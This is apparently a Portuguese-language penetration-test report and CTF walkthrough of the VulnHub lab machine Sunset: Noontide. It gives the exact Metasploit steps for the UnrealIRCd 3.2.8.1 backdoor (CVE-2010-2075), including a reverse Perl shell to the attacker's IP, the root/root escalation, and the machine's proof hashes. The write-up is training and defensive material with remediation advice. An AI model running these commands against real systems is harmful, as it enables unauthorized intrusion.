
Descrição Avaliação profissional de teste de penetração da máquina Sunset: Noontide do VulnHub, cobrindo reconhecimento, enumeração de serviços, exploração da CVE-2010-2075, pós-exploração, escalonamento de privilégios e comprometimento total do sistema.
Uma avaliação profissional de teste de penetração e walkthrough de CTF da Sunset: Noontide, uma máquina intencionalmente vulnerável da VulnHub.
Este projeto documenta o ciclo de vida completo do teste de penetração, incluindo reconhecimento, enumeração de serviços, pesquisa de vulnerabilidades, exploração, acesso inicial, pós-exploração, escalonamento de privilégios, prova de comprometimento, avaliação de risco, mapeamento MITRE ATT&CK e remediação.
⚠️ Aviso: Esta avaliação foi realizada contra uma máquina intencionalmente vulnerável em um ambiente de laboratório autorizado. As técnicas e comandos documentados aqui destinam-se apenas a sistemas para os quais foi obtida autorização explícita.
| Componente | Detalhes |
|---|---|
| Alvo | Sunset: Noontide |
| Plataforma | VulnHub |
| IP do Alvo | 10.106.186.186 |
| Nome do Host do Alvo | noontide |
| SO do Alvo | Debian GNU/Linux 10 (Buster) |
| Arquitetura | x86_64 |
| Plataforma do Atacante | Kali Linux |
| IP do Atacante | 10.106.186.204 |
| Tipo de Avaliação | Avaliação de Laboratório Autorizada |
| Risco Geral | CRÍTICO |
| Resultado da Avaliação | Comprometimento Total do Sistema |
Descoberta do Alvo → Enumeração Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Exploração Metasploit → Shell de Comando Remoto → Shell como server → Pós-Exploração Linux → Credencial Root Fraca → su root → UID 0 / Acesso Root → Arquivos de Prova de Usuário e Root
A descoberta inicial de rede foi realizada para identificar o alvo vulnerável.
O alvo foi finalmente identificado como:
10.106.186.186
Durante o reconhecimento, 10.106.186.142 foi identificado como o gateway padrão, e não como o alvo pretendido.
Isso destaca a importância de identificar corretamente o alvo antes de realizar testes de segurança adicionais, particularmente em uma rede de laboratório em bridge ou compartilhada.
A detecção de serviço e versão do Nmap foi realizada contra o alvo usando:
nmap -sV 10.106.186.186
O serviço exposto significativo identificado durante a avaliação foi:
6667/tcp open irc UnrealIRCd
Um scan mais detalhado foi então realizado usando:
nmap -sC -sV -Pn -p 6667 10.106.186.186
O serviço foi identificado como:
UnrealIRCd 3.2.8.1
O serviço IRC também reportou:
irc.foonet.com
O serviço UnrealIRCd exposto tornou-se a principal superfície de ataque investigada durante a avaliação.
O SearchSploit foi usado para investigar vulnerabilidades documentadas publicamente associadas à versão do UnrealIRCd descoberta.
Comando:
searchsploit UnrealIRCd 3.2.8.1
O resultado relevante foi:
UnrealIRCd 3.2.8.1 - Backdoor Command Exec
linux/remote/16922.rb
A vulnerabilidade foi identificada como:
CVE-2010-2075
Execução de Comando por Backdoor no UnrealIRCd 3.2.8.1
Crítica
Execução Remota de Comandos
A exploração bem-sucedida do serviço vulnerável permite que um atacante execute comandos remotamente no sistema alvo.
O serviço IRC vulnerável foi explorado usando o Metasploit Framework.
O módulo selecionado foi:
exploit/unix/irc/unreal_ircd_3281_backdoor
Exemplo de configuração:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 10.106.186.186
As tentativas iniciais de payload não produziram uma sessão utilizável.
Um payload Unix reverse-Perl compatível foi subsequentemente selecionado:
set payload cmd/unix/reverse_perl
set LHOST 10.106.186.204
set LPORT 4444
run
O Metasploit reportou que o alvo parecia vulnerável e abriu com sucesso uma sessão de shell de comando.
O shell obtido foi verificado usando:
whoami
Resultado:
server
Isso confirmou a execução remota de comandos bem-sucedida como a conta server.
O diretório de trabalho inicial era:
/home/server/irc/Unreal3.2
Neste estágio, a avaliação progrediu da exploração remota de serviço para a enumeração local de pós-exploração.
Após obter o shell, a enumeração padrão do Linux foi realizada para entender o host comprometido e identificar possíveis caminhos de escalonamento de privilégios.
Comando:
id
Resultado:
uid=1000(server) gid=1000(server)
A conta era um usuário não-root.
Comando:
hostname
Resultado:
noontide
Comando:
uname -a
Resultado:
Linux noontide 4.19.0-10-amd64 x86_64
Comando:
cat /etc/os-release
Resultado:
Debian GNU/Linux 10 (buster)
Esses comandos estabeleceram a identidade atual, nome do host, versão do kernel, sistema operacional e configuração geral do sistema.
Várias verificações padrão de escalonamento de privilégios no Linux foram realizadas.
Comando:
find / -perm -4000 -type f 2>/dev/null
Binários SUID padrão como passwd, chsh, mount, umount, su, chfn, newgrp e gpasswd foram identificados.
Nenhum binário SUID personalizado ou anômalo óbvio foi identificado como o vetor de escalonamento bem-sucedido.
Comando:
sudo -l
Nenhum caminho útil de escalonamento de privilégios baseado em sudo foi identificado a partir da saída disponível.
Comandos:
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
Os trabalhos agendados observados eram trabalhos de sistema padrão no estilo Debian.
Nenhum trabalho cron de root gravável óbvio foi identificado.
Comando:
find / -writable -type f 2>/dev/null | head -100
Os resultados iniciais eram principalmente pseudo-arquivos /proc e não revelaram um vetor prático de escalonamento de privilégios.
Comando:
getcap -r / 2>/dev/null
Nenhum escalonamento de privilégios útil baseado em capacidades foi identificado a partir da saída resultante.
O caminho bem-sucedido de escalonamento de privilégios foi baseado nas credenciais de root intencionalmente fracas configuradas na máquina vulnerável.
A conta root foi acessada usando:
su root
Senha:
root
O acesso root foi então verificado usando:
id
Resultado:
uid=0(root) gid=0(root) groups=0(root)
A identidade também foi confirmada usando:
whoami
Resultado:
root
Isso confirmou o controle administrativo completo do sistema alvo.
O arquivo de prova em nível de usuário estava localizado em:
/home/server/local.txt
Comando:
cat /home/server/local.txt
Resultado:
c53c08b5bf2b0801c5d0c24149826a6e
O arquivo de prova em nível de root estava localizado em:
/root/proof.txt
Comando:
cat /root/proof.txt
Resultado:
ab28c8ca8da1b9ffc2d702ac54221105
A prova de root também retornou:
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
A recuperação de ambos os arquivos de prova confirma o comprometimento bem-sucedido desde o acesso remoto inicial até o controle em nível de root.
| ID | Descoberta | Severidade | Impacto |
|---|---|---|---|
| VULN-01 | Backdoor no UnrealIRCd 3.2.8.1 | 🔴 Crítica | Execução Remota de Comandos |
| VULN-02 | Credenciais Root Fracas | 🔴 Crítica | Comprometimento Administrativo Completo |
Severidade: Crítica
Serviço Afetado: IRC / TCP 6667
Software Afetado: UnrealIRCd 3.2.8.1
CVE: CVE-2010-2075
Tipo de Ataque: Execução Remota de Comandos
Impacto Observado: Shell remoto obtido como server
O serviço UnrealIRCd exposto estava executando uma versão vulnerável associada a uma vulnerabilidade conhecida de execução de comandos por backdoor.
A vulnerabilidade foi identificada através da enumeração de serviços e pesquisa no SearchSploit e foi explorada com sucesso usando o Metasploit.
Um atacante capaz de alcançar o serviço IRC vulnerável poderia executar comandos remotamente e obter acesso não autorizado ao host.
Severidade: Crítica
Conta Afetada: root
Credencial Observada: root / root
Impacto Observado: Acesso administrativo UID 0
A conta root foi configurada com uma credencial extremamente fraca.
Após obter um shell local como server, a conta root foi acessada usando a credencial fraca e verificada com UID 0.
Um atacante que obtém acesso local ao shell pode usar a credencial root fraca para obter controle completo do sistema operacional.
Substitua a instalação vulnerável do UnrealIRCd por uma versão confiável e suportada.
Verifique a integridade do software e a procedência do pacote antes da implantação.
Se a integridade ou procedência do software for incerta, reconstrua o sistema usando mídia de instalação confiável e pacotes verificados.
Substitua credenciais padrão e fracas por credenciais administrativas fortes e exclusivas.
Não use senhas simples como root.
Se o IRC for necessário, restrinja o acesso usando:
Mantenha um processo documentado de gerenciamento de patches para o sistema operacional e todos os serviços expostos.
Registre e revise:
O host Sunset: Noontide foi comprometido com sucesso desde o acesso inicial à rede até o controle completo em nível de root.
A principal vulnerabilidade de acesso inicial foi o backdoor do UnrealIRCd 3.2.8.1 (CVE-2010-2075).
A vulnerabilidade proporcionou execução remota de comandos e resultou em um shell inicial como a conta server.
A enumeração de pós-exploração foi então realizada, incluindo verificações de SUID, sudo, cron, arquivos graváveis, capacidades do Linux, identidade, sistema operacional e sistema de arquivos.
Essas verificações não identificaram a rota de escalonamento bem-sucedida.
O acesso administrativo completo foi finalmente alcançado através das credenciais root fracas da máquina.
A recuperação bem-sucedida de ambos os arquivos de prova em nível de usuário e de root confirmou o comprometimento total do sistema.
CRÍTICO — Comprometimento Total do Sistema Alcançado
Um relatório profissional detalhado de teste de penetração está incluído neste projeto:
Sunset-Noontide-Penetration-Testing-Report.pdf
O relatório contém:
Estrutura sugerida do repositório:
sunset-noontide-pentesting/
├── README.md
├── Sunset-Noontide-Penetration-Testing-Report.pdf
└── evidence/
├── 01-target-discovery.png
├── 02-nmap-enumeration.png
├── 03-searchsploit.png
├── 04-metasploit-exploitation.png
├── 05-initial-shell.png
├── 06-post-exploitation.png
├── 07-privilege-escalation.png
└── 08-root-proof.png
As capturas de tela devem conter apenas informações do ambiente de laboratório autorizado.
Esta avaliação proporcionou experiência prática em:
Este repositório destina-se estritamente a:
As técnicas documentadas neste repositório devem ser realizadas apenas contra sistemas para os quais foi obtida autorização explícita.
Não use essas técnicas contra sistemas de produção, infraestrutura pública ou sistemas de terceiros sem permissão.
Alen Sales K S
Cybersecurity | Penetration Testing | SOC | Network Security
GitHub: https://github.com/zales2004
Sunset: Noontide demonstra um fluxo de trabalho completo de teste de penetração:
Reconhecimento → Enumeração → Pesquisa de Vulnerabilidades → Exploração → Acesso Inicial → Pós-Exploração → Escalonamento de Privilégios → Acesso Root → Coleta de Evidências → Avaliação de Risco → Relatório de Segurança
Resultado da Avaliação: CRÍTICO — Comprometimento Total do Sistema Alcançado
| Técnica | ID | Atividade Observada |
|---|
| Network Service Scanning | T1046 | Enumeração Nmap |
| Exploit Public-Facing Application | T1190 | Exploração do serviço UnrealIRCd exposto |
| Command and Scripting Interpreter | T1059 | Shell de comando remoto |
| Valid Accounts | T1078 | Uso de credenciais root |
| Account Discovery | T1087 | Enumeração de identidade e usuários |
| System Information Discovery | T1082 | uname e /etc/os-release |
| File and Directory Discovery | T1083 | Enumeração do sistema de arquivos |
| Scheduled Task/Job Discovery | T1053 | Enumeração de cron |
| Permission Groups Discovery | T1069 | id e enumeração de grupos |
| Fase | Atividades |
|---|
| Reconhecimento | Descoberta de rede e identificação do alvo |
| Enumeração | Detecção de serviço/versão com Nmap |
| Pesquisa de Vulnerabilidades | Identificação de módulos SearchSploit e Metasploit |
| Exploração | Exploração do backdoor do UnrealIRCd |
| Acesso Inicial | Shell de comando como server |
| Pós-Exploração | Enumeração de identidade, SO, sistema de arquivos e privilégios |
| Escalonamento de Privilégios | Verificações de SUID, sudo, cron, arquivos graváveis e capacidades |
| Coleta de Evidências | Arquivos de prova de usuário e root |
| Relatório | Descobertas, análise de risco e remediação |
| Objetivo | Status |
|---|
| Alvo Identificado | ✅ PASS |
| Serviço Exposto Identificado | ✅ PASS |
| Versão Vulnerável Identificada | ✅ PASS |
| CVE Identificado | ✅ PASS |
| Execução Remota de Comandos | ✅ PASS |
Shell Inicial como server | ✅ PASS |
| Prova de Usuário Recuperada | ✅ PASS |
| Escalonamento de Privilégios | ✅ PASS |
| Acesso Root Verificado | ✅ PASS |
| Prova de Root Recuperada | ✅ PASS |